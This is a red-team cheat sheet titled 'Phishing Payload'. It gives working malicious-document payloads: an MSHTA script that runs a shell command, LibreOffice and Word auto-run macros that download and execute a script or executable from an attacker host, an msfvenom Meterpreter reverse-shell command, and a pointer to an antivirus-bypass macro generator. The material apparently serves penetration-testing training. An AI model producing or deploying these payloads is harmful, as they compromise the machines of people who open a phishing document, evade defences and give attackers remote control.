Phishing Payload
Prepare for phishing payload
MSHTA
# simple ping
<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("ping -n 3 10.10.x.y");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>LibreOffice (Linux)
If your target have script to open the document, use LibreOffice is a simple way.
Write Documents
Create Macros
Tools > Macros > Organize Macro > Basic
[Basic Macros]
Untitled 1 > New > (give a name)Macro payload:
Sub Main
Shell("cmd /c powershell iwr http://<ip attacker>/shell.ps1 -o C:/Windows/Tasks/shell.ps1")
Shell("cmd /c powershell C:/Windows/Tasks/shell.ps1")
End SubTools > Customize > Events [Open Document]
> Macro... > (choose last macro)Save Document.
Microsoft Word
make sure you save the document as doc or docm. just try that both for your payload.
Write Documents
Create Macros
View > Macros
[Basic Macros]
"MyMacro" > CreateMacro payload
check the encoded payload below:
Bypass All The ThingsSave Document.
Macro
BadAssMacro
Bypass antivirus with this auto genreated macro:
https://github.com/Inf0secRabbit/BadAssMacros
Generate shellcode with format raw
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f raw > shellcode.rawGenerate VBA
.\BadAssMacrosx64.exe -i shellcode.raw -s indirect -p no -w doc -o out.txtCopy paste the out.txt to VBA Script.
Standard Format
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Sub MyMacro()
Dim str As String
str = "powershell (New-Object System.Net.WebClient).DownloadFile('http://<ATTACKER IP>/testing.exe', 'C:\Windows\Tasks\testing.exe')"
Dim exePath As String
exePath = "C:\Windows\Tasks\" + "testing.exe"
Shell str, vbHide
Wait (3)
Shell exePath, vbHide
End Sub
Sub Wait(n As Long)
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", n, t)
End Sub
Last updated